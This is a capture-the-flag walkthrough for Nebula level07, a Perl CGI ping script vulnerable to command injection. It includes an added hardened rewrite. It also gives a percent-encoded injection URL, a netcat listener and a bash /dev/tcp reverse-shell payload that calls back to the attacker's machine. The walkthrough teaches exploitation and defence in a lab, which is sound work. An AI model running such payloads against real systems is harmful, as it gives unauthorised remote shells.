How to pwn Nebula: level07 - Command Injection in a CGI script

Exploit-Exercises: Nebula


Level07 - Command injection

Here is what we can find on Exploit-Exercises:

The flag07 user was writing their very first perl program that allowed them to ping hosts to see if they were reachable from the web server.
To do this level, log in as the level07 account with the password level07. Files for this level can be found in /home/flag07.

They also provide the source code:

#!/usr/bin/perl

use CGI qw{param};

print "Content-type: text/html\n\n";

sub ping {
  $host = $_[0];

  print("<html><head><title>Ping results</title></head><body><pre>");

  @output = `ping -c 3 $host 2>&1`;   # $host is interpolated unescaped into a command run by /bin/sh -c
  foreach $line (@output) { print "$line"; }

  print("</pre></body></html>");
  
}

# check if Host set. if not, display normal page, etc

ping(param("Host"));

The weakness of this program is this line:

@output = `ping -c 3 $host 2>&1`;

If we control the $host variable we can inject a command and get a shell: Perl backticks hand the whole string to /bin/sh -c, so shell metacharacters such as ; or | in the Host parameter are interpreted, and the script never validates the value.
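As an added example (not code from the original post or from Exploit-Exercises), here is the level's vulnerable ping() next to a hardened rewrite that allowlists the host and starts ping without going through a shell. It assumes a Unix-like system with ping(8) on PATH; the names ping_vulnerable and ping_safe are chosen for this illustration.

```perl
#!/usr/bin/perl
# Added example, not from the original post or from Exploit-Exercises:
# the level's vulnerable ping() next to a hardened rewrite.
# Assumes a Unix-like system with ping(8) on PATH; ping_safe and
# ping_vulnerable are names chosen for this illustration.
use strict;
use warnings;

# Vulnerable: $host is interpolated into a string that the backticks hand
# to "/bin/sh -c", so a value such as "localhost;id" also runs id.
sub ping_vulnerable {
    my ($host) = @_;
    return `ping -c 3 $host 2>&1`;
}

# Hardened: (1) allowlist the value, (2) start ping without a shell.
sub ping_safe {
    my ($host) = @_;
    # Accept only hostname/IPv4 characters, first character alphanumeric,
    # at most 253 characters (the DNS limit); anything else is refused.
    die "invalid host\n"
        unless defined $host && $host =~ /\A[A-Za-z0-9][A-Za-z0-9.-]{0,252}\z/;

    my $pid = open(my $fh, '-|');     # fork; the child's STDOUT is piped to $fh
    die "fork failed: $!\n" unless defined $pid;
    if ($pid == 0) {                  # child
        open STDERR, '>&', \*STDOUT or die "dup failed: $!\n";  # same as 2>&1
        # List-form exec never goes through /bin/sh, so shell metacharacters
        # in $host cannot be interpreted; "--" stops ping from reading the
        # value as an option.
        exec 'ping', '-c', '3', '--', $host
            or die "exec failed: $!\n";
    }
    my @output = <$fh>;               # parent collects ping's output lines
    close $fh;
    return @output;
}

# The injection payload from this level is refused before any process
# starts; an ordinary host name is pinged.
for my $h ('localhost;id', 'localhost') {
    my @out = eval { ping_safe($h) };
    if ($@) { print "[$h] rejected: $@" }
    else    { print "[$h] ok:\n", @out }
}
```

The allowlist is the first line of defence and the list-form exec is the second: even if the regex were loosened, there is no shell to interpret a metacharacter. If the output is echoed into an HTML page as the original script does, it should also pass through CGI's escapeHTML before printing.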

So let's try to hack this program.

We can run index.cgi directly with perl from the command line. CGI.pm accepts name=value pairs as arguments for debugging, so Host=localhost sets the Host parameter to localhost:

perl /home/flag07/index.cgi Host=localhost

Let's try to inject a command the same way (for example appending ;id to the Host value).

The output of id shows that, run like this, the script executes as level07. This is not what we want, so let's read thttpd.conf.

This is interesting: thttpd.conf shows a web server listening on port 7007. A command injected through that server runs as whatever user thttpd runs as, not as level07.

Now I will show you a method to get a reverse shell.

Web Browser attack

Open a web browser on your Kali Linux machine and go to http://nebula_ip:7007/index.cgi?Host=localhost

You will see the result of the ping in your web browser.
Now, what happens if we append a command like this: http://nebula_ip:7007/index.cgi?Host=localhost; id ? Will it work?

What? No output from the id command?

The reason is that CGI.pm treats ";" as a query-string separator, exactly like "&". Everything after the raw semicolon is parsed as a separate parameter, so the Host value the script receives is just "localhost" and nothing is injected. If we percent-encode the ";" as %3B, it stays inside the Host value and is only decoded after the parameters have been split:
http://nebula_ip:7007/index.cgi?Host=localhost%3Bid

Yes! The command is executed as flag07! But now I want a shell!

On my Kali Linux machine I start a listener:

nc -lvp 8888

To get a reverse shell you can run

bash -i >& /dev/tcp/kali_linux_ip/8888 0>&1

(The >& redirection and /dev/tcp are bash features, not POSIX sh. The script's backticks pass the command to /bin/sh, so if /bin/sh on the target is dash rather than bash, wrap the payload as bash -c '...' so that bash parses it.)

Percent-encode the whole payload, including the spaces, slashes and redirection characters, so that none of it is interpreted by the browser or split by CGI.pm, and you will have
http://nebula_ip:7007/index.cgi?Host=localhost%3Bbash%20-i%20%3E%26%20%2Fdev%2Ftcp%2Fkali_linux_ip%2F8888%200%3E%261

If we visit the link and wait, the listener receives the connection.

You get a shell! :slight_smile: Well done, hacker! You're ready for level08.
